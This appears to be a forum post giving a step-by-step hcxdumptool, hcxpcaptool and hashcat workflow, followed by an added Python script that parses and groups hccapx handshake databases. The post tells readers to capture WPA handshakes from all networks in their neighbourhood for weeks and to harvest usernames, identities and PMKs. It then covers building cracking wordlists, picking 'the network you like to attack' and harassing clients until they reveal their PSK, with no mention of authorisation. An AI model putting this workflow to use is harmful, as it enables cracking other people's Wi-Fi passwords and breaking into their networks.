hcxtools - solution for capturing wlan traffic and conversion to hashcat formats
Hi taxil.
Neither method 1 nor method 2 nor method 3.
First some words about the basic rationale behind hcxtools:
- hcxtools are analysis tools
- what we did not record is gone forever

1) get all handshakes from established connections in your neighbourhood
hcxdumptool -i interface -o record.pcap -t 5 -b blacklisthome

2) if you got all, focus on (new) clients (longterm - weeks!)
hcxdumptool -i interface -o record.pcap -t 60 -D -b blacklisthome

3) do the conversion
hcxpcaptool -o new.hccapx -E probelist -I identitylist -U usernamelist -P pmklist *.pcap
(if a wpa encrypted hotspot is in range, additionally use -O newall.hccapx to retrieve also connect attempts)

4) add all this raw data to your databases
cat new.hccapx >> database_best.hccapx
cat new.hccapx newall.hccapx >> database_all.hccapx
cat probelist >> databaseprobelist
cat identitylist >> databaseidentitylist
cat usernamelist >> databaseusernamelist
cat pmklist >> databasepmklist
cat database*list > workinglist (and sort this list uniq)
run workinglist against your database_best and use --potfile option of hashcat
create pmklist from hashcat.2500 potfile
cat pmklist >> databasepmklist
from now on, you can run pmklist in combination with --remove against your database and/or incoming to remove already cracked ones in a very fast way.

Now put your focus on common ESSIDs and get them:
wlanhcx2ssid -i database_xxx.hccapx -X default (you can do this on best and/or raw)
In this case you get the full advantage of reusing PBKDF2 on default.hccapx for common ESSIDs

If you need a single ESSID:
wlanhcx2ssid -i database_best.hccapx -w forced.hccapx

Retrieve info about converted networks:
wlanhcxinfo -i forced.hccapx -a -s -e | sort | uniq

and get exactly the network you like to attack by mac or ESSID or whatever you like:
wlanhcx2ssid -i forced.hccapx -A mac_ap

Do not try to run useless wordlists found in www (and most of them are useless for your purpose)
Analyze your potfile to get information about the keyspace of similar networks (same VENDOR and/or ISP)
Use -O option of hcxpcaptool (maybe a client made a typo - half PSK, you are able to crack)
Analyze probelist (maybe PSK or similar PSK is inside)
Build your own wordlist based on your database lists and run rules on them
cat database lists and cracked to one list and run princeattack
Annoy the client to retrieve his NVRAM and/or PSK - longterm: hcxdumptool -i interface -o record.pcap -t 60 -D -b blacklisthome
(that is not the same as a "normal" rogue AP or an evil twin - we are on protocol level)

This procedure will work:
for example https://wpa-sec.stanev.org/?stats
Last 24h processed handshakes: 15760
Last 24h performance: 176.23K/s
Last 24h submissions: 288
Last 24h founds: 231
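Steps 3 and 4 above build a database by appending hccapx records, and "Retrieve info about converted networks" then lists ESSIDs and MACs with wlanhcxinfo. The following Python is an added example, not code from ZerBea or from hcxtools: it parses such a concatenated hccapx file using the 393-byte record layout hashcat documents for the format (assumed here from that documentation), rejects a truncated append, and groups records by ESSID into unique AP/client pairs the way `wlanhcxinfo -a -s -e | sort | uniq` does. The grouping also shows where the PBKDF2 reuse mentioned for default.hccapx applies, since every record under one ESSID shares the same salt. The sample database is constructed inline with placeholder nonces and MICs and is not a real capture.

```python
import struct
import sys
from collections import defaultdict

# hccapx record layout as documented by hashcat: 393 bytes, little-endian, no padding.
# Field order: signature, version, message_pair, essid_len, essid[32], keyver,
# keymic[16], mac_ap[6], nonce_ap[32], mac_sta[6], nonce_sta[32], eapol_len, eapol[256]
HCCAPX_STRUCT = struct.Struct("<4sIBB32sB16s6s32s6s32sH256s")
HCCAPX_SIZE = HCCAPX_STRUCT.size  # 393
HCCAPX_SIGNATURE = b"HCPX"
HCCAPX_VERSION = 4


def parse_hccapx(data: bytes) -> list:
    """Parse a concatenated hccapx file (what the 'cat >> database_*.hccapx' step builds)."""
    if len(data) % HCCAPX_SIZE:
        raise ValueError(f"length {len(data)} is not a multiple of {HCCAPX_SIZE}: truncated append?")
    records = []
    for off in range(0, len(data), HCCAPX_SIZE):
        (sig, version, message_pair, essid_len, essid, keyver, _keymic,
         mac_ap, _nonce_ap, mac_sta, _nonce_sta, eapol_len, _eapol) = HCCAPX_STRUCT.unpack_from(data, off)
        if sig != HCCAPX_SIGNATURE or version != HCCAPX_VERSION:
            raise ValueError(f"record at offset {off}: bad signature/version")
        if essid_len > 32 or eapol_len > 256:
            raise ValueError(f"record at offset {off}: length field out of range")
        records.append({
            "essid": essid[:essid_len],
            "mac_ap": mac_ap.hex(":"),
            "mac_sta": mac_sta.hex(":"),
            "message_pair": message_pair & 0x07,  # low bits: which EAPOL message pair (0-5); upper bits are flags
            "keyver": keyver,                      # 1 = WPA (HMAC-MD5 MIC), 2 = WPA2 (HMAC-SHA1 MIC), 3 = AES-CMAC
        })
    return records


def summarize(records: list) -> dict:
    """Group by ESSID -> sorted unique (AP, client) pairs, like 'wlanhcxinfo -a -s -e | sort | uniq'.

    All records under one ESSID share the PBKDF2 salt, so one PMK computation per
    candidate PSK covers every one of them (the reuse the post refers to).
    """
    by_essid = defaultdict(set)
    for r in records:
        by_essid[r["essid"]].add((r["mac_ap"], r["mac_sta"]))
    return {essid: sorted(pairs) for essid, pairs in by_essid.items()}


def make_record(essid: bytes, mac_ap: bytes, mac_sta: bytes,
                message_pair: int = 0, keyver: int = 2) -> bytes:
    """Constructed test record: MIC, nonces and EAPOL are zero placeholders, not a real handshake."""
    return HCCAPX_STRUCT.pack(HCCAPX_SIGNATURE, HCCAPX_VERSION, message_pair, len(essid),
                              essid.ljust(32, b"\0"), keyver, b"\0" * 16,
                              mac_ap, b"\0" * 32, mac_sta, b"\0" * 32, 0, b"\0" * 256)


# Constructed sample database: four records, two of them the same AP/client pair
# (a second message pair for the same handshake, as a cat-appended database would contain).
SAMPLE_HCCAPX = b"".join([
    make_record(b"HomeNet", bytes.fromhex("001122334455"), bytes.fromhex("aabbccddeeff")),
    make_record(b"HomeNet", bytes.fromhex("001122334455"), bytes.fromhex("aabbccddeeff"), message_pair=2),
    make_record(b"HomeNet", bytes.fromhex("001122334466"), bytes.fromhex("aabbccddee00")),
    make_record(b"CoffeeShop", bytes.fromhex("66778899aabb"), bytes.fromhex("112233445566")),
])


def main(argv):
    # Usage: python hccapx_summary.py database_best.hccapx   (falls back to the constructed sample)
    data = open(argv[1], "rb").read() if len(argv) > 1 else SAMPLE_HCCAPX
    for essid, pairs in summarize(parse_hccapx(data)).items():
        print(essid.decode("utf-8", "replace"), len(pairs), "unique AP/client pair(s)")
        for ap, sta in pairs:
            print("   ", ap, "<->", sta)


if __name__ == "__main__":
    main(sys.argv)
```

The length check matters for databases built by appending: a copy interrupted mid-record leaves a file hashcat will reject, and it is cheaper to catch that when you merge than after a long run.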